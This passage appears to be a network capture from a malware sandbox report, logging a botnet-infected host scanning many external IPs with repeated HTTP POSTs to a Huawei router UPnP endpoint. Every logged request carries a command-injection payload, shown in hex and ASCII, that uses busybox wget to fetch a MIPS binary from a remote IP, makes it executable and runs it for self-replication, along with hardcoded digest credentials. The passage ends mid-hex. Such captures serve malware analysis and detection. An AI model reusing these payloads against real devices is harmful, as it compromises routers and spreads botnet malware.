                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1970192.168.2.1355772197.144.10.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685168982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1971192.168.2.1358920210.186.111.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685542107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1972192.168.2.134907041.59.91.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685559988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1973192.168.2.1360018197.121.220.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685573101 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1974192.168.2.135351238.188.32.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685595036 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1975192.168.2.1337632157.113.184.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685631037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1976192.168.2.135719041.158.155.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685657024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1977192.168.2.1334428157.20.43.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685669899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1978192.168.2.1358318157.105.233.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685704947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1979192.168.2.1348016157.175.59.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685713053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 